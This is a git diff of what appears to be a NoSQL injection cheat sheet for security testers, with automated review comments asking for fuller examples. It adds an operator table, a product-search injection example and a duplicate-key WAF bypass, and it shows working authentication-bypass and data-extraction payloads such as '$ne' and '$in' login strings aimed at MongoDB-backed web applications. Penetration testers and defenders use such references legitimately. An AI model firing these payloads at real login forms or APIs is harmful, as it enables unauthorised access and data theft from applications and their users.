NoSQL injection WAF

Swissky
2025-04-01 20:22:10 +02:00
parent f344fa50a6
commit 8379e65ce0


@@ -6,9 +6,11 @@
* [Tools](#tools) * [Tools](#tools)
* [Methodology](#methodology) * [Methodology](#methodology)
* [Operator Injection](#operator-injection)
* [Authentication Bypass](#authentication-bypass) * [Authentication Bypass](#authentication-bypass)
* [Extract Length Information](#extract-length-information) * [Extract Length Information](#extract-length-information)
* [Extract Data Information](#extract-data-information) * [Extract Data Information](#extract-data-information)
* [WAF and Filters](#waf-and-filters)
* [Blind NoSQL](#blind-nosql) * [Blind NoSQL](#blind-nosql)
* [POST with JSON Body](#post-with-json-body) * [POST with JSON Body](#post-with-json-body)
* [POST with urlencoded Body](#post-with-urlencoded-body) * [POST with urlencoded Body](#post-with-urlencoded-body)
@@ -24,11 +26,37 @@
## Methodology ## Methodology
NoSQL injection occurs when an attacker manipulates queries by injecting malicious input into a NoSQL database query. Unlike SQL injection, NoSQL injection often exploits JSON-based queries and operators like `$ne`, `$gt`, `$regex`, or `$where` in MongoDB.
### Operator Injection
| Operator | Description |
| -------- | ------------------ |
| $ne | not equal |
| $regex | regular expression |
| $gt | greater than |
| $lt | lower than |
| $nin | not in |
Example: A web application has a product search feature
```js
db.products.find({ "price": userInput })
```
An attacker can inject a NoSQL query: `{ "$gt": 0 }`.
```js
db.products.find({ "price": { "$gt": 0 } })
```
Instead of returning a specific product, the database returns all products with a price greater than zero, leaking data.
### Authentication Bypass ### Authentication Bypass
Basic authentication bypass using not equal (`$ne`) or greater (`$gt`) Basic authentication bypass using not equal (`$ne`) or greater (`$gt`)
* in HTTP data * HTTP data
```ps1 ```ps1
username[$ne]=toto&password[$ne]=toto username[$ne]=toto&password[$ne]=toto
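Review bot: the Operator Injection table is missing operators that this same hunk and later sections rely on: the Methodology paragraph names `$where`, and the Extract Data section below uses `$in`, yet neither has a row; add `$in`, `$where` (server-side JavaScript evaluation, the most dangerous of the set) and `$exists`, and change `$lt | lower than` to `less than`. The product-search example should also state its precondition: `db.products.find({ "price": userInput })` is only injectable when `userInput` reaches the driver as an object, i.e. the server parsed a JSON body or a bracketed query string such as `price[$gt]=0` into a nested object; if the value arrives as the string `{ "$gt": 0 }` the filter compares against that literal string and matches nothing. Without that sentence the reader cannot tell why the payload works in one application and fails in another.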
@@ -37,7 +65,7 @@ Basic authentication bypass using not equal (`$ne`) or greater (`$gt`)
login[$nin][]=admin&login[$nin][]=test&pass[$ne]=toto login[$nin][]=admin&login[$nin][]=test&pass[$ne]=toto
``` ```
* in JSON data * JSON data
```json ```json
{"username": {"$ne": null}, "password": {"$ne": null}} {"username": {"$ne": null}, "password": {"$ne": null}}
@@ -84,6 +112,18 @@ Extract data with "`$in`" query operator.
{"username":{"$in":["Admin", "4dm1n", "admin", "root", "administrator"]},"password":{"$gt":""}} {"username":{"$in":["Admin", "4dm1n", "admin", "root", "administrator"]},"password":{"$gt":""}}
``` ```
### WAF and Filters
**Remove pre-condition**:
In MongoDB, if a document contains duplicate keys, only the last occurrence of the key will take precedence.
```js
{"id":"10", "id":"100"}
```
In this case, the final value of "id" will be "100".
## Blind NoSQL ## Blind NoSQL
### POST with JSON Body ### POST with JSON Body
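Review bot: the new `WAF and Filters` section states the duplicate-key rule but never shows the injection it enables, so the heading promises more than the content delivers. Under `**Remove pre-condition**` the only snippet is `{"id":"10", "id":"100"}`; add the attacker's view: the query the application builds with a fixed pre-condition, the payload that re-injects the same key after it, and the resulting filter in which the attacker's value wins. Also qualify "only the last occurrence of the key will take precedence": this is the behaviour of the JSON or JavaScript object parsing that builds the filter (RFC 8259 only says object names SHOULD be unique), so it depends on the parser in front of MongoDB, and a WAF or gateway that normalises JSON may keep the first key instead, which is exactly the case a WAF section should call out. Finally, the referenced SensePost post covers both pre- and post-conditions while the section documents only the pre-condition case; either add the post-condition variant or narrow the heading to what is shown.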
@@ -198,8 +238,10 @@ end
## References ## References
* [Burp-NoSQLiScanner - matrix - January 30, 2021](https://github.com/matrix/Burp-NoSQLiScanner/blob/main/src/burp/BurpExtender.java) * [Burp-NoSQLiScanner - matrix - January 30, 2021](https://github.com/matrix/Burp-NoSQLiScanner/blob/main/src/burp/BurpExtender.java)
* [Getting rid of pre- and post-conditions in NoSQL injections - Reino Mostert - March 11, 2025](https://sensepost.com/blog/2025/getting-rid-of-pre-and-post-conditions-in-nosql-injections/)
* [Les NOSQL injections Classique et Blind: Never trust user input - Geluchat - February 22, 2015](https://www.dailysecurity.fr/nosql-injections-classique-blind/) * [Les NOSQL injections Classique et Blind: Never trust user input - Geluchat - February 22, 2015](https://www.dailysecurity.fr/nosql-injections-classique-blind/)
* [MongoDB NoSQL Injection with Aggregation Pipelines - Soroush Dalili (@irsdl) - June 23, 2024](https://soroush.me/blog/2024/06/mongodb-nosql-injection-with-aggregation-pipelines/) * [MongoDB NoSQL Injection with Aggregation Pipelines - Soroush Dalili (@irsdl) - June 23, 2024](https://soroush.me/blog/2024/06/mongodb-nosql-injection-with-aggregation-pipelines/)
* [NoSQL error-based injection - Reino Mostert - March 15, 2025](https://sensepost.com/blog/2025/nosql-error-based-injection/)
* [NoSQL Injection in MongoDB - Zanon - July 17, 2016](https://zanon.io/posts/nosql-injection-in-mongodb) * [NoSQL Injection in MongoDB - Zanon - July 17, 2016](https://zanon.io/posts/nosql-injection-in-mongodb)
* [NoSQL injection wordlists - cr0hn - May 5, 2021](https://github.com/cr0hn/nosqlinjection_wordlists) * [NoSQL injection wordlists - cr0hn - May 5, 2021](https://github.com/cr0hn/nosqlinjection_wordlists)
* [Testing for NoSQL injection - OWASP - May 2, 2023](https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.6-Testing_for_NoSQL_Injection) * [Testing for NoSQL injection - OWASP - May 2, 2023](https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.6-Testing_for_NoSQL_Injection)
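Review bot: `NoSQL error-based injection` is added to References but no hunk in this commit adds an error-based section, and the TOC hunk above lists none; either add the section the reference supports or hold the entry for the commit that does. The `Getting rid of pre- and post-conditions` reference does back the new `WAF and Filters` text, and both entries are correctly alphabetised and follow the `Title - Author - Date` format of the surrounding list.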